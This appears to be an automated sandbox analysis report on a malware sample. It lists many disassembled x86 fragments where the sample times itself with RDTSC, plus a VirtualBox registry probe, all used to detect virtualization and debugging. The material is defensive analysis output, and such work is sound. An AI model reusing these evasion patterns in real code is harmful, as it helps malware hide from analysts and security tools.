    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC962 second address: 9AC971 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD14683Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B213FC second address: B2140D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2140D second address: B2141E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD14683Ch 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B284D1 second address: B284DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4CD3D7AA6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B284DB second address: B284F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4CD14683Ch 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28688 second address: B2868C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B287C1 second address: B287D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146844h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B287D9 second address: B287E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B287E8 second address: B28812 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4CD146836h 0x00000008 jmp 00007FB4CD14683Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FB4CD146842h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28B63 second address: B28BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AACh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FB4CD3D7AB8h 0x00000012 jmp 00007FB4CD3D7AB2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28E3F second address: B28E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146846h 0x00000009 ja 00007FB4CD146836h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007FB4CD14683Fh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A910 second address: B2A9BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a xor dword ptr [esp], 05E8FB1Dh 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FB4CD3D7AA8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FB4CD3D7AB1h 0x00000030 mov edx, dword ptr [ebp+122D3521h] 0x00000036 push 00000003h 0x00000038 sbb ecx, 589DFA81h 0x0000003e push 00000000h 0x00000040 jc 00007FB4CD3D7AA8h 0x00000046 mov esi, dword ptr [ebp+122D36F1h] 0x0000004c push 00000003h 0x0000004e call 00007FB4CD3D7AB6h 0x00000053 pop edi 0x00000054 call 00007FB4CD3D7AA9h 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FB4CD3D7AB3h 0x00000061 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A9BE second address: B2AA1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146843h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB4CD14683Eh 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FB4CD146848h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ebx 0x0000001a pushad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d jl 00007FB4CD146836h 0x00000023 popad 0x00000024 pop ebx 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB4CD14683Ch 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA1D second address: B2AA31 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4CD3D7AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA31 second address: B2AA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4CD146836h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 xor ebx, dword ptr [ebp+122D3791h] 0x0000001a mov dword ptr [ebp+122D186Ah], edi 0x00000020 popad 0x00000021 lea ebx, dword ptr [ebp+1245168Ah] 0x00000027 mov dword ptr [ebp+122D292Dh], ecx 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA65 second address: B2AA6B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AADF second address: B2AAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AAE5 second address: B2AB30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FB4CD3D7AAEh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D2925h], edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1ED4h], edi 0x0000001e call 00007FB4CD3D7AA9h 0x00000023 jmp 00007FB4CD3D7AB6h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AB30 second address: B2AB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AC33 second address: B2AC3D instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4CD3D7AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C3A8 second address: B4C3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C3AD second address: B4C3CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FB4CD3D7AA6h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4CD3D7AADh 0x00000011 jnc 00007FB4CD3D7AA6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22F59 second address: B22F6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4CD14683Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A209 second address: B4A228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB4CD3D7AB1h 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FB4CD3D7AA6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A228 second address: B4A232 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A4A1 second address: B4A4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22F63 second address: B22F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A627 second address: B4A65D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB4CD3D7AB6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A65D second address: B4A677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD146844h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A677 second address: B4A67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A67B second address: B4A69D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FB4CD146849h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A927 second address: B4A92F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A92F second address: B4A939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB4CD146836h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A939 second address: B4A93D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A93D second address: B4A949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A949 second address: B4A94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A94D second address: B4A962 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4CD146836h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A962 second address: B4A966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A966 second address: B4A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADBF second address: B4ADC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADC3 second address: B4ADD2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF14 second address: B4AF1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BD5B second address: B4BD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BEDC second address: B4BEF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BEF0 second address: B4BF0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB4CD146849h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4BF0F second address: B4BF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DA84 second address: B4DA98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FB4CD146838h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DA98 second address: B4DAAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007FB4CD3D7ACBh 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FB4CD3D7AA6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DAAD second address: B4DAC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD14683Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5584A second address: B55854 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4CD3D7AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A783 second address: B5A79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146847h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A79E second address: B5A7CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB4CD3D7AABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB4CD3D7AB5h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A7CA second address: B5A7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59EB3 second address: B59EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C356 second address: B5C37B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB4CD146836h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 6EEF94B0h 0x00000015 mov si, ax 0x00000018 call 00007FB4CD146839h 0x0000001d pushad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C37B second address: B5C388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C388 second address: B5C392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C392 second address: B5C39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C39B second address: B5C39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C39F second address: B5C3FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FB4CD3D7AB3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jmp 00007FB4CD3D7AAFh 0x00000018 pushad 0x00000019 jg 00007FB4CD3D7AA6h 0x0000001f jmp 00007FB4CD3D7AB4h 0x00000024 popad 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b pushad 0x0000002c je 00007FB4CD3D7AA6h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C3FA second address: B5C413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB4CD146842h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C532 second address: B5C53C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB4CD3D7AA6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CAE0 second address: B5CAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5CAE4 second address: B5CAEE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D0EF second address: B5D0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D0F4 second address: B5D145 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FB4CD3D7AA8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov edi, 0F29D4F1h 0x0000002a nop 0x0000002b jmp 00007FB4CD3D7AB7h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push edi 0x00000035 pop edi 0x00000036 push edx 0x00000037 pop edx 0x00000038 popad 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D145 second address: B5D14A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D41E second address: B5D422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D422 second address: B5D426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D426 second address: B5D45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB4CD3D7AB8h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB4CD3D7AB5h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D45E second address: B5D462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D743 second address: B5D7A5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4CD3D7AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB4CD3D7AB7h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FB4CD3D7AA8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push eax 0x0000002c js 00007FB4CD3D7AACh 0x00000032 sub dword ptr [ebp+122D292Dh], edx 0x00000038 pop esi 0x00000039 xchg eax, ebx 0x0000003a jc 00007FB4CD3D7AB4h 0x00000040 pushad 0x00000041 jno 00007FB4CD3D7AA6h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C343 second address: B1C34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB4CD146836h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BAA second address: B60BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6031A second address: B60328 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60328 second address: B6032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BB0 second address: B60BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD146849h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60BCD second address: B60BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6032C second address: B60332 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61648 second address: B61651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61651 second address: B6165E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6165E second address: B61662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62B20 second address: B62B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62B24 second address: B62BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FB4CD3D7AA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007FB4CD3D7AA8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 jmp 00007FB4CD3D7AAEh 0x00000045 xchg eax, ebx 0x00000046 jmp 00007FB4CD3D7AB5h 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007FB4CD3D7AB8h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B636F8 second address: B636FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
